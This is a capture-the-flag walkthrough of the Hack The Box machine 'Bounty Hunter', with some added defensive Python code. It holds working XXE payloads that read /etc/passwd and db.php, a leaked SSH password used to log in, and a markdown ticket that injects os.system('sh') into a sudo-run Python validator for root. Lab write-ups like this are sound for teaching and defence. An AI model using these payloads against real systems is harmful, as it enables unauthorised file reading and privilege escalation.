Hack The Box — Bounty Hunter

Aneesh Verma
4 min read · Aug 20, 2021

This is a beginner-friendly machine. The root flag in particular tests your privilege-escalation mindset.
I opened the website and started looking for hints; usually there are hints either on the web page itself or in its source code.

From here I thought the attack might have something to do with Burp or a buffer overflow.
I submitted the Contact form, but no POST request was sent, so I ignored it.
I checked the source code but couldn't find anything.
Then I went to the Portal page and immediately saw that the website is written in PHP.
Afterwards I submitted details through log_submit.php and could see that a POST request was being made. I thought that inspecting this request in Burp would be worthwhile.

At the same time I ran a port scan with Nmap and Masscan and directory enumeration with FFUF. Only ports 22 and 80 were open and nothing interesting was there. Directory enumeration turned up three pages:
portal.php
log_submit.php
db.php [Status: 200, Size: 0, Words: 1, Lines: 1]

I opened db.php in the browser and looked at its source code, but couldn't find anything.

Back to Burp Suite. I checked the POST request.

The first thing I noticed was that the data was sent Base64-encoded; the second was that, once decoded, it was XML.
I did try brute-forcing by encoding sleep 5 in Base64 and sending it, but then I realised I needed to manipulate the XML.

The first place my mind goes when I think about XML is an XXE (XML External Entity) attack.
First I checked whether a basic new entity works.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe "3">]>
<bugreport>
<title>&xxe;</title>
<cwe>d</cwe>
<cvss>d</cvss>
<reward>qf</reward>
</bugreport>

Encode it in Base64 and then URL-encode it.

We can see that it's working.
Now came the deciding moment of this box: if SYSTEM "file:///etc/passwd" worked, then we had found the vulnerability.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<bugreport>
<title>&xxe;</title>
<cwe>d</cwe>
<cvss>d</cvss>
<reward>qf</reward>
</bugreport>

Encode it in Base64 and then URL-encode it.

Here we go. We have found the vulnerability, and we have the list of users on the server.
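From the defender's side, the request chain above (raw XML, Base64-encoded, then URL-encoded) can be unwrapped and inspected before any real parser touches it. The following is an added Python example, not code from the original write-up or from the box: it decodes a constructed copy of the payload the way the page describes and uses expat's declaration callbacks to flag the DOCTYPE and the external entity without ever resolving it.

```python
import base64
import urllib.parse
import xml.parsers.expat

# Constructed sample: the bug-report XML from the write-up, wrapped the way the
# portal's POST body is described (raw XML -> Base64 -> URL-encoding).
XXE_XML = (
    b'<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    b'<!DOCTYPE foo [ <!ELEMENT foo ANY >\n'
    b'<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>\n'
    b'<bugreport><title>&xxe;</title><cwe>d</cwe><cvss>d</cvss><reward>qf</reward></bugreport>'
)
BENIGN_XML = b'<bugreport><title>typo</title><cwe>79</cwe><cvss>3</cvss><reward>5</reward></bugreport>'
XXE_DATA_PARAM = urllib.parse.quote(base64.b64encode(XXE_XML))
BENIGN_DATA_PARAM = urllib.parse.quote(base64.b64encode(BENIGN_XML))

def decode_body(param_value):
    """Reverse the encoding chain: URL-decode, then Base64-decode, back to raw XML bytes."""
    return base64.b64decode(urllib.parse.unquote(param_value))

def find_entity_risks(xml_bytes):
    """List DOCTYPE and entity declarations in untrusted XML without resolving any.

    expat does no I/O itself; with no ExternalEntityRefHandler installed a
    reference such as &xxe; is simply skipped, so inspecting raw input is safe.
    """
    findings = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(f"doctype {name}")

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:
            findings.append(f"external entity {name} -> {system_id}")
        else:
            findings.append(f"internal entity {name}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError as exc:
        findings.append(f"malformed xml: {exc}")
    return findings

def should_reject(param_value):
    """Policy: a bug report has no business carrying a DOCTYPE, so any finding rejects it."""
    return bool(find_entity_risks(decode_body(param_value)))
```

The same policy belongs in the PHP endpoint itself: a bug-report form never needs a DTD, so reject any body with a DOCTYPE and parse the rest with external entity loading disabled.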

Vulnerability to SHELL

Gaining a shell was easy, but I wasted my time on the wrong things.
First I tried expect://id, which didn't work.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id">]>
<bugreport>
<title>&xxe;</title>
<cwe>d</cwe>
<cvss>d</cvss>
<reward>qf</reward>
</bugreport>

Then I tried to turn it into an SSRF attack, which also failed.

Finally, I started reading the PHP files I had found with FFUF. I couldn't find anything in portal.php or log_submit.php. I got especially curious about db.php, first because of its name and second because its size was 0 in the browser.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php" >]>
<bugreport>
<title>&xxe;</title>
<cwe>d</cwe>
<cvss>d</cvss>
<reward>qf</reward>
</bugreport>

Using this payload I got a Base64 string in the response. I decoded it and got an almost ideal result.

I had a password, and I knew I had to use SSH now. The question was: for which user? I got confused between admin and test, and even thought bounty could be the username. I wasted some time on this before remembering that I already had a list of users from /etc/passwd.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin

From here I chose the most unusual entry that still looked like a username someone would deliberately keep: development.

ssh development@10.10.11.100 with the password m19RoAU0hP41A1sTsq6K, and voila, we get a shell.

Life is good :). I got the user flag and submitted it. I took a break for a while after this.

Privilege Escalation

I kept the basic idea in mind: find something that development can run with root privileges.
The first thing I did was sudo -l:
User development may run the following commands on bountyhunter:
(root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py

So the development user can run ticketValidator.py as root without a password. On checking it, I saw that it processes markdown (md) files.
Following the rules of ticketValidator, create the md file:

# Skytrain Inc
## Ticket to
__Ticket Code:__
**200+ 24 == 224 and __import__('os').system('sh') == False

Privesc

And we are in. We have successfully rooted Bounty Hunter.
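The bypass above works because the validator evidently hands the ticket-code line to Python's eval, so any expression in a file the caller controls runs as root through sudo. As an added example (not the box's ticketValidator.py, whose source is not on the page), this Python validator accepts the same markdown layout but parses the code line with ast and allows only integer arithmetic and comparisons, so the page's payload is rejected while a plain ticket code still validates. The header and destination rules below are assumptions taken from the md file shown above, not the script's real rule set.

```python
import ast
import operator

# Allowlist: only integer arithmetic and comparisons may appear in a ticket code.
_BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}
_CMP_OPS = {ast.Eq: operator.eq, ast.NotEq: operator.ne, ast.Lt: operator.lt, ast.Gt: operator.gt}

def safe_eval(expr):
    """Evaluate a ticket-code expression by walking its AST; anything outside the
    allowlist (names, calls, attributes, 'and'/'or', strings) raises ValueError."""
    def walk(node):
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.Compare) and len(node.ops) == 1 and type(node.ops[0]) in _CMP_OPS:
            return _CMP_OPS[type(node.ops[0])](walk(node.left), walk(node.comparators[0]))
        raise ValueError(f"disallowed syntax in ticket code: {type(node).__name__}")
    return walk(ast.parse(expr, mode="eval").body)

def validate_ticket(lines):
    """Check a ticket in the layout from the write-up (assumed rules, not the box's):
    header, destination line, '__Ticket Code:__', then a '**'-prefixed code that must be True."""
    if len(lines) < 4 or not lines[0].startswith("# Skytrain Inc"):
        return False
    if not lines[1].startswith("## Ticket to"):
        return False
    if lines[2].strip() != "__Ticket Code:__" or not lines[3].startswith("**"):
        return False
    try:
        return safe_eval(lines[3].strip()[2:]) is True
    except (ValueError, SyntaxError):
        return False
```

Even with a safe evaluator, the sudo rule itself is the larger problem: a root NOPASSWD entry for an interpreter running a script that reads user-supplied files should be replaced by a fixed, root-owned input path or removed.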
